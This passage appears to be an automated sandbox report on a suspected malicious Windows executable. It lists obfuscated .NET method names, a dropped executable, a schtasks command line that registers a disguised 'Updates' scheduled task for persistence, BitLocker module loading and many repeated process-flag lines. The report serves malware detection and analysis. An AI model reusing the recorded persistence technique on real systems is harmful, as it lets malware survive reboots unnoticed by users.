                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, Lonn3j0q0AQi6YTE3j.csHigh entropy of concatenated method names: 'fxkFIrHfoO', 'YTSFt0yp7a', 'ksEFlxFYNG', 'OErF7hKg0c', 'YtYFQCqUqA', 'vATFBpiYj7', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, FIkKZKJloOjyigcxKH.csHigh entropy of concatenated method names: 'UpWFn3gS7S', 'FgoFu2YhNL', 'vFQFEClmFU', 'nEwFbm2T54', 'iYWFjR5AQG', 'ousFCNDJNJ', 'qPeF47R2Vy', 'KFHF6RC82H', 'a4EFS8OitU', 'VWPF3joA2F'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, Qq1obo5AW8WT5RBnbv.csHigh entropy of concatenated method names: 'Efgb07TkVK', 'V9kbkfB1Kg', 'AJIElkfQ8m', 'OV7E7pcI3O', 'B90EBhrHsZ', 'iOgEewLNV5', 'WloEHpbhak', 'y8kEYBTAWd', 'vGSEK1CaZo', 'jvVEJ8MfRi'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, CgsZrxZ5bJs1isOAsW.csHigh entropy of concatenated method names: 'UWPmsd4QMr', 'RnQmLNauKL', 'egDmVPQ6eQ', 'k39mnkhrH2', 'gVtmuYhBbi', 'iEgmb6FgUY', 'AiJmjZAgm1', 'NyTF2H4ckQ', 'LHBFZmcP6p', 'pyGFXSUxER'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, SE8ir6ghUdmEJkMdDS.csHigh entropy of concatenated method names: 'i5ZPSuAxEP', 'nTXP3twPni', 'ToString', 'y1HPneMVfI', 'NgaPuxSA5x', 'F6tPEVQ2SG', 'VsiPbtmcnM', 'trpPjWf00U', 'uDyPC8g9N1', 'BraP4sNq6u'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, DuMROSxCmqfhBtrcL3.csHigh entropy of concatenated method names: 'yOMLTchpe7', 'WUGLnYiYoA', 'W37LusktDV', 'nAOLERtdAB', 'NOtLbPD8V1', 'a68LjAsYRL', 'HKfLCryrmp', 'Dg9L4lSPIH', 'VSTL65Hk8b', 'GgLLSF9iuC'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, I8KkSGhDf7BGedS1Qv.csHigh entropy of concatenated method names: 'YOQEaScGNA', 'FHjEGyIy69', 'P3TEyGNNwa', 'zS9EfFPqPh', 'CmbERlnq2v', 'rmNEO8dEDR', 'jowEPurN3f', 'xP0EFmoVC3', 'tAaEm6q92H', 'qXLEURISO7'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, ecKDheHH0uffYM2Fi6g.csHigh entropy of concatenated method names: 'ToString', 'nCiULlRQEW', 'JtsUVdJmyo', 'D2uUTduAQw', 'SRsUn6kvnT', 'suQUujrSfL', 'z92UE7bTxV', 'jcVUbTGwvP', 'pXB0n1aLvsIBy5wpKXx', 'TC8ga4aKbPMkl7m2aI3'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, IsdtIxHB8KRIqEfRXKj.csHigh entropy of concatenated method names: 'GiHmrYCSxd', 'viVm8cae9y', 'RV2mN8JTnp', 'YBsmaiJgMm', 'ggem0RM16h', 'uFYmGoni9b', 'jDkmkfAx1u', 'U4Imy04y5y', 'cZ5mf9jI5t', 'yCqmvVeuBy'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, o1qUIqLK21d9xCwImS.csHigh entropy of concatenated method names: 'vl0jTDoOen', 'dutjuEMCfE', 'dlhjbDukj9', 'SXIjCJwB5h', 'BsSj4xTS9B', 'NEubgfo2Pk', 'XidbMFGR36', 'xvOb2QTN7f', 'svHbZSKI9O', 'ExmbXCWkky'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, gByks8SDMER85a92MA.csHigh entropy of concatenated method names: 'OwINxex6d', 'Ptdayw1cN', 'j8LG28fbQ', 'upDkMtIpU', 'EYLfUR9Z8', 'zamv3OM1G', 'XPe8lZAqgTFKdHXY4B', 'G5GgMxRJHM3G6iymMR', 'MWV11vH7X2200V9Y0E', 'jTqF4E6fA'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, h50wgh6LF9bYD0ikjA.csHigh entropy of concatenated method names: 'mwKCrhHvp4', 'Kq4C8T0owC', 'uCuCN2B2OJ', 'O7mCajJEXh', 'j6RC0eZXFJ', 'CAbCG6kwHs', 'k9WCk11vQJ', 'uGjCy69U4i', 'F96CfP8rPK', 'LHvCvogTlg'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, PKeJNeHl4Ackfff2Coj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'glgUQ9BWxx', 'dyJUxsikDy', 'kH8UdJdeTV', 'jZaUAJPspT', 'HdWUgysWDt', 'c1nUMAMH27', 'sPGU2IjCOY'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, wOtoBA4wweaIJmt93j.csHigh entropy of concatenated method names: 'RsmCn1tQkg', 'yeNCEyCYfj', 'wW9CjSjB6g', 'LVwjoyeZVZ', 'oA6jzs0shx', 'W0XCwj5YUT', 'DIcCsriERW', 'aANChQbx9O', 'ItQCLZxknk', 'mA2CV915AA'
                  Source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, D3p30FN1f5pTIN89YF.csHigh entropy of concatenated method names: 'mEYsCWCQH2', 'ehbs4CeB8K', 'XBBsSdcBqB', 'fK0s3N03jZ', 'HQnsRGdDRG', 'S9XsO4qc0a', 'udnwfs0wC0KHgRaGVG', 'VTiteiFRcgynPZ21Dn', 'GhDssHi5ka', 'rhJsLi99uL'
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeFile created: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp760C.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
